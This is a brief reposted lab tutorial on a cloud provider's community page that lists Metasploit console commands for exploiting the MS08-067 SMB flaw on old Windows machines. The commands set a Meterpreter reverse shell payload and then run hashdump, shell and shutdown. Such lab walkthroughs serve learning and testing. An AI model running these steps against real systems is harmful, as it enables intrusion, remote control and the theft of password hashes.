Using Metasploit to attack PC processes with ms8067 vulnerabilities

Source: Internet
Author: User

Topological environment: 2 virtual machines, one Kali, another XP with ms08067 vulnerability or 2000 or 2003 machines

Msfconsole entering the MSF console

Enter Search ms0-067

Find the appropriate module

Use EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI using the appropriate module

Set PAYLOAD windows/meterpreter/reverse_tcp setting bounce Connection

Show Options View setup options

Set RHOST 192.168.80.XX setting up a remote host

Set Lhost 192.168.80.YY setting Local Host

Show targets view attack target system type

Set Target 1 targets machine is 2000

Exploit

Wait for the attack to succeed, appear meterpreter>

Enter help view to use the command

Ipconfig view the IP address of the opponent

Hashdump get the other hash value

Shell uses shell command, CTRL + Z to enter the background, exit exit

Shutdown

You can upload and download files, etc.

Using Metasploit to attack PC processes with ms8067 vulnerabilities

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.